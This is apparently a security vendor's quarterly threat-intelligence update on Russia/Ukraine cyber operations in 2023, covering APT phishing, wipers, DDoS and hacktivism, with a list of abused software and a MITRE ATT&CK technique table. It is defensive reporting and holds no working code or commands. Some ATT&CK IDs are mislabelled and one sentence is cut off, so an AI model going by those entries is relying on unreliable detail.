Russia/Ukraine Update - December 2023

December 6, 2023

The Russia/Ukraine war is approaching its second year, and both physical and cyber warfare continue. Ukraine has continued to conduct defensive strategies, while cybercriminal groups have also persisted in launching DDoS, information stealing, and wiper attacks. Russia has launched further attacks while dealing with internal struggles. The war has caused a rippling effect of destruction and disruption across the world, including a persistent impact within the cybercriminal landscape.


Optiv’s Global Threat Intelligence Center (gTIC) has provided periodic updates on Russian and Ukrainian actions as well as estimated cyber-related implications in advisories and Optiv blog posts on February 4, February 22, February 24, June 30, August 25, September 29, October 31, November 29, December 20, March 02, 2023, May 30, 2023 and August 25, 2023. This update will provide information on the events of the previous 90 days and what we can expect looking forward.


This will be the last quarterly update related to the ongoing Russia/Ukraine conflict. Optiv’s gTIC will provide updates via blog posts and advisories on an ad-hoc basis.




In June 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) warned that the Russia-linked threat group, APT28 (aka BlueDelta, Sofacy, PawnStorm, Fancy Bear, Forest Blizzard, FROZENLAKE) had conducted phishing attacks with malicious attachments that exploited vulnerabilities in Roundcube servers (CVE-2020-35730, CVE-2020-12641, and CVE-2021-44026) to run reconnaissance and exfiltrate sensitive data. The scripts redirected incoming emails and gathered session cookies, user information, and address books. CERT-UA reported that phishing emails were sent to more than 40 government organizations.


In October 2023, CERT-UA shared that threat actors tracked as UAC-0165 had “interfered” with at least 11 Ukrainian telecommunications organizations between May - September 2023, which led to service interruptions that impacted customers. The threat group conducted reconnaissance and post-exploitation activities from previously compromised servers and utilized two programs, POEMGATE and POSEIDON, which enable credential theft and remote control of the infected hosts. The group also reportedly used a utility called WHITECAT to erase any forensic trail. Once the group successfully breached the network, they attempted to disable network and MikroTik server equipment, as well as data storage systems.


In May 2023, CERT-UA reported that threat actors, attributed to as UAC-0006, had conducted a phishing campaign with invoice-themed lures to deploy the SmokeLoader malware in a polyglot file. CERT-UA regards this as a financially motivated operation designed to steal credentials and make unauthorized transfers of funds. In another advisory from April 2023, CERT-UA warned of destructive attacks attributed to UAC-0165 against public sector organizations. The group deployed a script-based wiper malware called RoarBAT, which searched for files with a specific extension list before permanently using the legitimate WinRAR utility to permanently delete them. CERT-UA attributed UAC-0165 to the Russia-linked Sandworm Team (aka FROZENBARENTS, SeaShell Blizzard, Voodoo Bear), which has historically used wiper malware to target Ukrainian organizations.


In July 2023, The CERT-UA shared their discovery of Microsoft Excel (xls) documents containing a legitimate macro and a macro that launches the PicassoLoader malware and subsequently execute the njRAT malware. CERT-UA attributed this activity to UAC-0057 (aka GhostWriter), a threat actor that they had also observed sending phishing emails with malicious attachments containing an exploit for CVE-2023-38831 (CVSS 7.8), a vulnerability impacting WinRAR archiving software. The adversary’s goal was to deploy the Cobalt Strike beacon, followed by the PicassoLoader malware. The use of njRAT, a strain of malware active since 2010, proves how threat actors do not necessarily have to create custom or bespoke malware when older and more simple tools and procedures are still effective.


In July 2023, security researchers with BlackBerry reported that the threat actors behind the RomCom malware had carried out phishing attacks against Ukraine and supporting countries just before a NATO Summit in Lithuania. The threat actor appeared to use this important, Ukraine-specific event as a lure to push the malware to victims, and researchers discovered a website impersonating the Ukrainian World Congress non-profit organization. The execution chain used in this campaign exploited the Follina remote code execution vulnerability, CVE-2022-30190, which impacts Microsoft's Support Diagnostic Tool (MSDT). Reported in May 2022, this vulnerability is an attractive attack vector for threat actors of all sophistication levels. Optiv’s gTIC conducted analysis of more than 45 ransomware groups and 26 APT groups across multiple countries, including Russia, North Korea, China, and Iran, and identified 5 ransomware groups and 13 APT groups that have been observed exploiting the Follina vulnerability since its disclosure.


In August 2023, Microsoft security researchers reported that Midnight Blizzard (aka Nobelium, APT29, UNC2452, and Cozy Bear) was observed using Microsoft Teams to mount targeted campaigns aimed at stealing Microsoft 365 passwords and pivoting into organizations’ Azure Active Directory and other sensitive environments. The group reportedly targeted 40 global government, technology, manufacturing, and media organizations. Midnight Blizzard used previously compromised valid accounts to send social engineering messages while impersonating technical support. The threat actor attempted, in some cases, to add a device to the organization as a managed device via Microsoft Entra ID. While the victims of these campaigns were located worldwide, there is an Even Chance that future attacks and espionage/information gathering campaigns carried out by APT29 will be targeted toward Ukrainian and NATO country’s organizations to gather strategic information.


In August 2023, U.S. federal agencies and international partners in the U.K., New Zealand, Australia, and Canada published a report warning that the Sandworm Team threat actor was deploying a new strain of malware called “Infamous Chisel.” This malware, while not highly sophisticated, enables persistent remote access to infected Android devices over the TOR network and the subsequent exfiltration of strategic system information that would provide value to the Russian government.


In September 2023, CERT-UA reported that it stopped a cyberattack attributed to APT28 against an unnamed Ukrainian critical energy infrastructure facility. The attack began with a phishing email that, when clicked by the victim, activated an infection chain and downloaded a malicious ZIP archive. A scheduled task enabled persistence, and RCE was implemented using a cURL through a legitimate service called


In September 2023, Reuters reported that “Russian spies were using hackers to target computer systems at law enforcement agencies in Ukraine in a bid to identify and obtain evidence related to alleged Russian war crimes,” according to Ukraine’s cyber defense chief. Reuters also indicates that these adversaries have increased their targeting of the Ukrainian Prosecutor General’s office and “departments documenting war crimes.” Ukraine’s cyber defense chief reported that the focus of Russia-linked APT groups has shifted from energy facilities to law enforcement agencies, which had previously not been targeted. The purported goal of the campaigns, according to Reuters, was to help Russian individuals “avoid prosecution and move them back to Russia.”


In October 2023, the website of the British royal family suffered a DDoS attack that the Russian-linked threat group, KillNet, claimed responsibility for. The site was down for nearly 90 minutes, and the threat group reportedly did not gain access to its systems, content, or site. The website was targeted days after King Charles condemned the invasion of Ukraine, indicating that the DDoS attack was Likely in retaliation for speaking against the Russian actions. KillNet has previously targeted government websites within Europe, including the European Parliament website after the lawmakers approved a resolution calling Moscow a state sponsor of terrorism in November 2022.



Figure 1: KillNet claimed responsibility for the DDoS attack on the official website of the royal family (Source: Telegram)


In October 2023, a Ukrainian official stated that Russian cyberattacks had become more sophisticated and frequent, the daily goal of disrupting vital infrastructure. Deputy Foreign Minister Anton Demokhin reported that the cyberattacks, while not as devastating as expected, were consuming significant time, attention, and resources to defend networks and prevent damage and further disruption. Ukraine recorded 3,974 cyber incidents between January 2022 and September 2023, with most coming from Russian attackers.


In October 2023, the Cyber Army of Russia Reborn, a Russian-affiliated threat group, openly advertised for a “chat admin or moderator” position on cybercriminal forums. The Cyber Army of Russia Reborn is a hacktivist group that is widely believed to be a replica of another hacktivist group, IT Army of Ukraine. The Cyber Army of Russia reportedly conducts DDoS attacks on Ukrainian organizations and government agencies of countries in support of Ukraine. The group has claimed that conflicts and geopolitical tensions is the motivation of their attacks. It is not clear why the Cyber Army of Russia Reborn advertised for a position openly on the dark web. However, it raises concerns for security researchers about the group’s intentions. There is an Even Chance that this position advertisement indicates that the group is seeking to strengthen capabilities and expand operations.




The IT Army of Ukraine, a collective that has nearly 10,000 volunteers, continues to be active against Russian organizations. The group claimed responsibility for temporarily disabling internet services in some of the territories occupied by the Russian army. The group reportedly conducted attacks against Russia the internet providers, “Miranda-media,” “Krimtelekom,” and MirTelekom,” and has invited supporters to install their software to increase the botnet network. As with most DDoS attacks, the companies mitigated the attacks and restored services within 24 hours.



Figure 2: IT Army of Ukraine claims responsibility for DDoS attacks (Source: Telegram)


In October 2023, Recorded Future indicated that Ukrainian hackers had reportedly teamed up with the nation’s security services, the SBU, to “breach Russia’s largest private bank” and “obtain the data of more than 30 million customers.” These hackers told Recorded Future that they would share this data with journalists.


In October 2023, the Ukrainian Cyber Alliance (UCA), a Ukrainian hacktivist group, infiltrated and disrupted the Trigona ransomware operation. Initiated in 2021, the UCA is comprised of volunteers worldwide that purportedly work to defend the country’s cyberspace against Russian attacks. UCA hackers reportedly gained access to the Trigona ransomware infrastructure by leveraging a public exploit for CVE-2023-22515 (CVSS 9.8) in Confluence Data Center and Server. UCA maintained persistence and eventually wiped the servers completely.



Figure 3: Trigona data leak site


Based on ransomware variant similarities, the Trigona ransomware group is believed to have ties to the Russia-linked Alphv ransomware operation (aka BlackCat). The UCA reported that they would provide decryption keys found in the stolen data and any relevant information to law enforcement agencies.



Other Countries

From August to September 2023, the U.S. Cyber Command (CYBERCOM) deployed a team of cyberwarfare experts in Lithuania, which borders Moscow’s heavily militarized Kaliningrad enclave, to conduct a “defensive hunt operation.” The specialists reportedly searched for evidence of malicious activities, and the purported goal of the operation was to “defend the nation in and through cyberspace.” The operation was not conducted to directly benefit Ukraine, but rather because the same threat actors often conduct operations against NATO countries like Lithuania. Russia-linked cyberattacks targeting NATO countries in 2022 increased by 300%. Operations like the one conducted by CYBERCOM can be helpful in information sharing and mitigation techniques.


Since the start of the Russian/Ukraine conflict, thousands of people have joined hacktivist and hacker groups. While many of their attacks are DDoS attacks or unsophisticated in nature, they can cause disruptions and have led to the temporary disruption of business and operations in critical verticals including banks, pharmacies, hospitals, transportation services, and government operations.


In October 2023, the International Committee of the Red Cross (ICRC), published its first set of rules of engagement for civilian hackers. The rules have been dubbed a “Geneva Code” of cyber warfare and includes the following eight quoted rules.


  1. Do not direct cyberattacks against civilian objects.
  2. Do not use malware or other tools or techniques that spread automatically and damage military objectives and civilian objects indiscriminately.
  3. When planning a cyberattack against a military objective, do everything feasible to avoid or minimize the effects your operation may have on civilians.
  4. Do not conduct any cyber operation against medical and humanitarian facilities.
  5. Do not conduct any cyberattack against objects indispensable to the survival of the population or that can release dangerous forces.
  6. Do not make threats of violence to spread terror among the civilian population.
  7. Do not incite violations of international humanitarian law.
  8. Comply with these rules even if the enemy does not.


Both Ukrainian and Russian hacking groups have reported that they will work to de-escalate cyberattacks and comply with the rules that have been proposed. One of the groups, KillNet, reported to BBC News that they agree to the terms and rules, and it should be considered as a first step from the group towards peace. Additionally, the IT Army of Ukraine has vowed to avoid cyberattacks that would impact civilians.


If the commitments to follow these rules are sincere, there will Likely be a reduction in the number of cyberattacks causing disruptions to civilian operations over the next 12 months. However, these vows have previously proven to be untrue or unsuccessful. For example, in 2020, multiple ransomware groups – Maze, REvil, DoppelPaymer, and more – vowed to avoid healthcare organizations during the COVID-19 pandemic, which lasted for a few months before healthcare organizations were targeted again. Therefore, there is an Even Chance that the hacker groups will continue to target organizations and cause disruptions that affect civilians over the next 12 months.




In September 2023, the State Service of Special Communications and Information Protection of Ukraine (SSSCIP) released a report covering Russia’s cyber tactics in the first half of 2023. The goal of the report is to help Ukrainian cybersecurity specialists and international partners in mitigating and defending against Russia-linked cyberattacks. The report highlighted an increase in Russia-linked threat actors’ attention on law enforcement agencies, energy and media organizations, and their targeting of Ukraine has more than doubled (1.9 per day in H2 2022 to 4-5 per day in H1 2023). There were 342 confirmed incidents targeting Ukraine in the second half of 2022, and 762 in the first half of 2023 – an increase of 123%. The analysis revealed that Russia-linked threat actors often revisit victims that handle and maintain critical data of interest to the Russian military. This report, along with reports from Mandiant, highlight the increased use of living-off-the-land (LOTL) techniques observed in Russia-linked cyberattacks.


This type of report can be incredibly beneficial in information sharing operations, which enable accurate mitigation techniques and the spread of knowledge on groups’ and malware activities. It is Likely that Russia-linked threat groups will continue to target Ukraine and NATO countries, improve their TTPs, and identify ways to conduct more complex and successful attacks over the next 12 months. Also over the next 12 months, it is Likely that Russia-linked groups will increasingly focus on evading detection and conducting long-term espionage attacks targeting Ukraine and supporting countries to steal sensitive information that would be of strategic value to the Russian government.


Other countries that have a history of state-sponsored and/or APT attacks which have indirectly aligned or maintained suspicious neutrality towards Russia include China and India, which could also pose additional risks or proxies for cyberattacks. While China has ultimately avoided physical involvement in the war, they have maintained a suspicious balance between suspending and continuing trade and business suspended business. China-linked threat groups have also parroted Russian narratives when they aligned with China’s criticism of the U.S. Despite a focus on the U.S., there is an Even Chance that these groups could target countries of strategic interest to Russia over the next 12 months.


It is Likely that Russian and Ukrainian hackers will continue to target vulnerabilities in ubiquitous software over the next 12 months. In addition to multiple vulnerabilities, Optiv’s gTIC assesses it is Likely that cybercriminals and fringe state-sponsored campaigns will use common software and malware in the coming months, such as:


  • RDP
  • SMB/Samba
  • UPnP
  • Oracle WebLogic
  • Microsoft Exchange
  • Microsoft SharePoint
  • VMware - vCenter, ESXi, vSphere, vAccess, Workspace ONE, Horizon
  • VPN clients – Pulse Secure, Fortinet Fortigate, Citrix Gateway
  • Jenkins
  • Atlassian – Jira, Confluence
  • Routers – Asus, MikroTik
  • Content management system (CMS) platforms - WordPress – Joomla!, Drupal, Magento, Adobe Commerce
  • Mimikatz
  • AdFind
  • AnyDesk
  • Rclone
  • Ngrok reverse proxy
  • Zoho ManageEngine
  • LogMeIn
  • TeamViewer


It is Likely that threat actors will continue to use the same tactics observed in cyberattacks attributed to Russia-linked and Russia-supporting groups.


Table 1: MITRE ATT&CK techniques observed in reported cyberattacks related to the Russia/Ukraine conflict


Tactic Technique Description
Reconnaissance T1595.002 Active Scanning: Vulnerability Scanning
T1589.001 Gather Victim Identity Information: Credentials
T1598 Phishing for Information:
T1598.003 Phishing for Information: Spearphishing Link
Resource Development T1583.001 Acquire Infrastructure: Domains
T1583.006 Acquire Infrastructure: Web Services
T1608.001 Stage Capabilities: Upload Malware
T1584.001 Compromise Infrastructure: Domains
T1584.003 Compromise Infrastructure: Virtual Private Server
T1584.004 Compromise Infrastructure: Server
T1584.006 Compromise Infrastructure: Web Services
T1586.002 Compromise Accounts: Email Accounts
T1586.003 Compromise Accounts: Cloud Accounts
T1587.001 Develop Capabilities: Malware
T1587.003 Develop Capabilities: Digital Certificates
T1585.001 Establish Accounts: Social Media Accounts
T1588.001 Obtain Capabilities: Malware
T1588.002 Obtain Capabilities: Tool
Initial Access T1566.001 Phishing: Spearphishing Attachment
T1566.002 Phishing: Spearphishing Link
T1566.003 Phishing: Spearphishing via Service
T1190 Exploit Public-Facing Application
T1133 External Remote Services
T1195.002 Supply Chain Compromise: Compromise Software Supply Chain
T1199 Trusted Relationship
T1078 Valid Accounts
T1078.002 Valid Accounts: Domain Accounts
T1078.003 Valid Accounts: Local Accounts
T1078.004 Valid Accounts: Cloud Accounts
T1189 Drive-by Compromise
Execution T1059.001 Command and Scripting Interpreter: PowerShell
T1059.003 Command and Scripting Interpreter: Windows Command Shell
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.006 Command and Scripting Interpreter: Python
T1059.007 Command and Scripting Interpreter: JavaScript
T1059.009 Command and Scripting Interpreter: Cloud API
T1559.001 Inter-Process Communication: Component Object Model
T1559.002 Inter-Process Communication: Dynamic Data Exchange
T1106 Native API
T1053.005 Native API
T1204.001 User Execution: Malicious Link
T1204.002 User Execution: Malicious File
T1047 Windows Management Instrumentation
T1651 Cloud Administration Command
T1203 Exploitation for Client Execution
Persistence T547.001 Server Software Component: Web Shell
T1136.003 Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
T1137 Boot or Logon Autostart Execution: Time Providers
T1137.002 Create Account: Local Account
T1098.001 Account Manipulation: Additional Cloud Credentials
T1098.002 Account Manipulation: Additional Email Delegate Permissions
T1098.003 Account Manipulation: Additional Cloud Roles
T1098.005 Account Manipulation: Device Registration
T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription
T1546.013 Event Triggered Execution: PowerShell Profile
T1546.015 Event Triggered Execution: Component Object Model Hijacking
T1556.007 Modify Authentication Process: Hybrid Identity
T1505.003 Server Software Component: Web Shell
T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)
T1542.003 Pre-OS Boot: Bootkit
Privilege Escalation T1546.008 Event Triggered Execution: Accessibility Features
T1546.015 Event Triggered Execution: Component Object Model Hijacking
T1068 Exploitation for Privilege Escalation
T1134.001 Access Token Manipulation: Token Impersonation/Theft
T1134.002 Access Token Manipulation: Create Process with Token
Defense Evasion T1055 Process Injection
T1055.012 Process Injection: Process Hollowing
T1140 Deobfuscate/Decode Files or Information
T1564.003 Hide Artifacts: Hidden Window
T1562.001 Impair Defenses: Disable or Modify Tools
T1562.002 Impair Defenses: Disable Windows Event Logging
T1562.004 Impair Defenses: Disable or Modify System Firewall
T1070.004 Indicator Removal: File Deletion
T1070.006 Indicator Removal: Timestomp
T1070.008 Indicator Removal: Clear Mailbox Data
T1112 Modify Registry
T1121 Template Injection
T1027 Obfuscated Files or Information
T1027.001 Obfuscated Files or Information: Binary Padding
T1027.004 Obfuscated Files or Information: Compile After Delivery
T1027.005 Obfuscated Files or Information: Indicator Removal from Tools
T1027.010 Obfuscated Files or Information: Command Obfuscation
T1027.011 Obfuscated Files or Information: Fileless Storage
T1218.005 System Binary Proxy Execution: Mshta
T1218.011 System Binary Proxy Execution: Rundll32
T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control
T1484.002 Domain Policy Modification: Domain Trust Modification
T1553.002 Subvert Trust Controls: Code Signing
T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass
T1553.006 Subvert Trust Controls: Code Signing Policy Modification
T1036.001 Masquerading: Invalid Code Signature
T1036.004 Masquerading: Masquerade Task or Service
T1036.005 Masquerading: Match Legitimate Name or Location
T1211 Exploitation for Defense Evasion
T1150.004 Use Alternate Authentication Material: Web Session Cookie
T1014 Rootkit
Credential Access T1528 Steal Application Access Token
T1552.004 Unsecured Credentials: Private Keys
T1110 Brute Force
T1110.001 Brute Force: Password Guessing
T1110.003 Brute Force: Password Spraying
T1555.003 Credentials from Password Stores: Credentials from Web Browsers
T1555.004 Credentials from Password Stores: Windows Credential Manager
T1621 Multi-Factor Authentication Request Generation
T1606.001 Forge Web Credentials: Web Cookies
T1606.002 Forge Web Credentials: SAML Tokens
T1003.003 OS Credential Dumping: NTDS
T1003.006 OS Credential Dumping: DCSync
T1649 Steal or Forge Authentication Certificates
T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting
T1539 Steal Web Session Cookie
Discovery T1083 File and Directory Discovery
T1120 Peripheral Device Discovery
T1057 Process Discovery
T1082 System Information Discovery
T1016.001 System Network Configuration Discovery: Internet Connection Discovery
T1033 System Owner/User Discovery
T1087.001 Account Discovery: Local Account
T1087.002 Account Discovery: Domain Account
T1087.004 Account Discovery: Cloud Account
T1482 Domain Trust Discovery
T1069.001 Permission Groups Discovery: Local Groups
T1069.002 Permission Groups Discovery: Domain Groups
T1018 Remote System Discovery
T1040 Network Sniffing
T1615 Group Policy Discovery
T1201 Password Policy Discovery
T1012 Query Registry
T1049 System Network Connections Discovery
T1007 System Service Discovery
T1124 System Time Discovery
Lateral Movement T1534 Internal Spearphishing
T1080 Taint Shared Content
T1021.001 Remote Services: Remote Desktop Protocol
T1021.002 Remote Services: SMB/Windows Admin Shares
T1021.005 Remote Services: VNC
T1021.006 Remote Services: Windows Remote Management
T1021.007 Remote Services: Cloud Services
T1550.001 Use Alternate Authentication Material: Application Access Token
T1550.003 Use Alternate Authentication Material: Pass the Ticket
T1210 Exploitation of Remote Services
T1091 Replication Through Removable Media
T1570 Lateral Tool Transfer
Collection T1119 Automated Collection
T1074.001 Data Staged: Local Data Staging
T1074.002 Data Staged: Remote Data Staging
T1025 Data from Removable Media
T1113 Screen Capture
T1560 Archive Collected Data
T1560.001 Archive Collected Data: Archive via Utility
T1005 Data from Local System
T1213 Data from Information Repositories
T1213.002 Data from Information Repositories: SharePoint
T1213.003 Data from Information Repositories: Code Repositories
T1114.002 Email Collection: Remote Email Collection
T1039 Data from Network Shared Drive
T1123 Audio Capture
Command & Control T1132 Data Encoding
T1102 Web Service
T1102.002 Web Service: Bidirectional Communication
T1071.001 Application Layer Protocol: Web Protocols
T1071.003 Application Layer Protocol: Mail Protocols
T1568 Dynamic Resolution
T1105 Ingress Tool Transfers
T1001.001 Data Obfuscation: Junk Data
T1001.002 Data Obfuscation: Steganography
T1573 Encrypted Channel
T1573.001 Encrypted Channel: Symmetric Cryptography
T1092 Communication Through Removable Media
T1090.001 Proxy: Internal Proxy
T1090.003 Proxy: Multi-hop Proxy
T1090.004 Proxy: Domain Fronting
Exfiltration T1041 Exfiltration Over C2 Channel
T1048.002 Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
T1020 Automated Exfiltration
T1030 Data Transfer Size Limits
T1567 Exfiltration Over Web Service
T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
Impact T1561 Disk Wipe
T1561.002 Disk Wipe: Disk Structure Wipe
T1486 Data Encrypted for Impact
T1485 Data Destruction
T1491.001 Defacement: Internal Defacement
T1498 Network Denial of Service
T1529 System Shutdown/Reboot
Intelligence Analyst | Optiv
Andi Ursry has over four years of experience in Threat Intelligence. Ursry began her career in the retail sector in Loss Prevention and Safety positions. She worked on-site to help stores mitigate risks. After seeing a shift toward cybercrime, she changed focus to cyber intelligence. Ursry’s research focuses on ransomware groups and their tactics.

Prior to joining Optiv, Ursry was a Cyber Threat Intelligence Analyst for a California-based cybersecurity company that specializes in digital risk. She earned a bachelor’s and master’s degree in criminal justice from Colorado Technical University, Online.

Optiv Security: Secure greatness.®

Optiv is the cyber advisory and solutions leader, delivering strategic and technical expertise to nearly 6,000 companies across every major industry. We partner with organizations to advise, deploy and operate complete cybersecurity programs from strategy and managed security services to risk, integration and technology solutions. With clients at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can. At Optiv, we manage cyber risk so you can secure your full potential. For more information, visit